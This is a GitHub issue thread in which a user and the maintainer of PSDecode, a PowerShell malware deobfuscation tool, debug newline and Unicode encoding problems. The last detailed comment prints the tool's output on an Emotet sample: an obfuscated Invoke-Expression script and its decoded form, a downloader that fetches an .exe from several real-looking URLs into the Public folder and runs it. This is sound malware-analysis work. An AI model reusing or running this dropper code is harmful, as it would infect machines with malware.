### ISSUE TITLE
PSDecode hangs

### ISSUE THREAD

**Issue by 0xdf-0xdf** [R3MRUM/PSDecode#2]
I am able to get PSDecode module installed such that powershell recognizes it as a module (will run it, tab auto complete, etc).

When I run something like "cat test.ps1 | psdecode", it just hangs... I've tried with a couple different samples, as well as saving off the output "layer1" from your readme.

I'm on Win10, in a VMWare VM.

I've set my execution policy to unrestricted.

**Comment by R3MRUM** [comment]
Hi dcheel,

Are you able to provide the test.ps1 that you are attempting to decode?

**Comment by R3MRUM** [comment]
Also, note that copying/pasting the layer 1 example on the PSDecode front page may not execute successfully as a result of inadvertent inclusion of newline characters during the copy/paste process. Layer 1 should only consist of a single long line of text.

**Comment by 0xdf-0xdf** [comment]
Definitely!

two examples attached. password is malware

**Comment by R3MRUM** [comment]
Hey dcheel,

It doesn't appear that your attachments came through. Perhaps GitHub or your email provider stripped them? 

Do you know if the script has been posted to VirusTotal or Hybrid Analysis? If so, let me know the hash and I can pull directly from there.

**Comment by 0xdf-0xdf** [comment]
What about pastebin?

https://pastebin.com/iAUhyFja

Two blocks in here. Both are emotet. First is the sample I was trying to
look at. Second is directly from your github page, just as a test to get it
working.

Thanks for getting back to me so quickly!

**Comment by 0xdf-0xdf** [comment]
oh, just saw your first message. that was it. i fixed the spacing, and it
worked!

the other sample (first line in the pastebin) now runs, but the windows
just dies... any ideas?

**Comment by R3MRUM** [comment]
Hey dcheel,

Just made an update to PSDecode which will hopefully fix the issue that you were having. The malware author included newline characters within single quotes which broke the old script. I've implemented changes to account for that. This should resolve your issue. Let me know if it does not.

**Comment by 0xdf-0xdf** [comment]
Awesome! Thanks for the quick update. I'll check now.

**Comment by 0xdf-0xdf** [comment]
Unfortunately, it still just dies on me. I've checked that the module I
have installed has the additional -replace on line 133 and 152. I've also
made sure that the command is all on one line.

Also, I did a manual base64 decode, can cat that file into psdecode, and it
gives me something that looks like just repeating back to me the 3rd line
(after the second line break inside ''). So I'm not sure it's working on
that either.

**Comment by R3MRUM** [comment]
Hey dcheel,

I suspect this has something to do with the fact that the base64 decoded string is unicode encoded which broke PSDecode as it expected ASCII encoding. I've updated PSDecode to include a switch, -u, that you can specify if the script you are attempting to decode is Unicode encoded. for example:

$ PSDecode .\malware.ps1 -u

Let me know if the updated script fixes your issue.

I am not sure if it is possible to reliably detect what encoding a file/string uses to eliminate the need for user specification, but I will continue to look into it. Currently, piping output from something like cat or Get-Content still does not work unless you first convert the output to ascii encoding. In order to implement a control for this, ill need to figure out how to automatically detect encoding type and re-encode appropriately.

**Comment by 0xdf-0xdf** [comment]
Awesome!

So the base64 encoded version (powershell.txt) just hangs now when this is
called (as opposed to killing the entire window before):
`psdecode -u powershell.txt`

If I manually decode (`cat powershell.txt | cut -d' ' -f5 | base64 -d >
powershell2.txt` on a linux vm), and then run that into psdecode, it works!
```
PS C:\Users\REM> PSDecode -u .\Desktop\powershell2.txt


############################## Layer 1 ##############################
InVoke-expReSsIoN(((("{13}{84}{37}{60}{97}{46}{15}{90}{93}{10}{111}{17}{20}{11}{96}{24}{38}{114}{33}{18}{91}{76}{32}{51}{65}{99}{30}{14}{28}{73}{26}{69}{41}{74}{77}{29}{63}{34}{47}{82}{102}{78}{50}{1}{43}{59}{54}{92}{21}{7}{80}{106}{8}{85}{31}{88}{52}{57}{61}{45}{22}{3}{103}{58}{64}{49}{0}{95}{56}{44}{105}{62}{110}{25}{55}{53}{67}{98}{107}{19}{70}{48}{94}{27}{75}{6}{9}{42}{81}{116}{113}{35}{71}{79}{12}{87}{86}{5}{108}{100}{104}{109}{16}{39}{115}{4}{89}{36}{101}{2}{72}{83}{68}{23}{66}{112}{40}"
-f'd','p://','Gv)(','i','vInvoRGv+RG','T','foreac','7F/@http://wep','/I0ge4woC','h(m91','cRGv','m','Oa','m91ns','ent;m','Gv+RGveRGv',',
','Gv) ra','eRGv+RGvwRGv+',':public
','ndo','/4TQf','m/qU','C','1Y','net/M0','=','eR','9','ext(10','Net.WebCli','S/@','o','vn','33);m91','y{m91Y','RGv','dasd
= &(R','YU = ','m91SDC);&','ch{}}','91nsad','asfc','knoc','asLB','
onsports.co
','R','A','91NSB','-design.','htt','bject','ttp://','Split(RGv@RGv
','or','FNV/RGv.','/myk','l','L/@htt','.','Gv','ewist','@http://maddin','000,
2821','ps://aluga','RGv) Syst',')',');m91SDC ','D',' m','+ RGv5qwRGv +
m','YU.diyDoA09W','m91','1NSB ','a','Gv);','-','sd.n',' ','nlA09','fun','
i','DCX =
RGv','S','a','Y','iy(m91asfc.diy','dFIA09led','h','vkRGv+','+RGvw-ob','RGv','g','je','
+ (RGv.exRGv+RGv','e',';m9','n','= m9','em.','rA09iA09','e-ItemR','
','v','N','HL1/','ds.com','1env','oSt','gdiy()','g.','+RGvtR',';break;}cat','1ADCX){tr','.(RG','(RG','n
m9'))-CrEPlAce ([chAr]53+[chAr]113+[chAr]119),[chAr]92
-REPlAcE'A09',[chAr]96-REPlAcE 'RGv',[chAr]39 -CrEPlAce  'm91',[chAr]36
-REPlAcE([chAr]100+[chAr]105+[chAr]121),[chAr]34))


############################## Layer 2 ##############################
$nsadasd = &('new-object') random;$YYU = .('new-object')
System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = '
http://knoc.org/4TQf7F/@http://wepfunds.com/I0ge4woCYS/@http://lewistonsports.com/qUivL/@https://aluga-design.de/mykasLBHL1/@http://madding.net/M0FNV/'.Split('@');$SDC
= $env:public + '\' + $NSB + ('.exe');foreach($asfc in
$ADCX){try{$YYU."DoWnlOadFIle"($asfc."ToStriNg"(),
$SDC);&('Invoke-Item')($SDC);break;}catch{}}


############################## Actions ##############################
1. [System.Random] Generate random integer between 10000 and 282133 . Value
returned: 56661
2. [System.Net.WebClient.DownloadFile] Download from:
http://knoc.org/4TQf7F/
3. [System.Net.WebClient.DownloadFile] Save downloaded file to:
C:\Users\Public\56661.exe
```

Definitely could be improved to get the encoded version working (ie, ascii
base64 text decodes into unicode), but this is great!

Thanks for the support.

**Comment by R3MRUM** [comment]
Closing this out as the original issues have been resolved. Will take implementing base64 decoding functionality as a to-do feature enhancement for a future release

**Comment by 0xdf-0xdf** [comment]
Thanks!
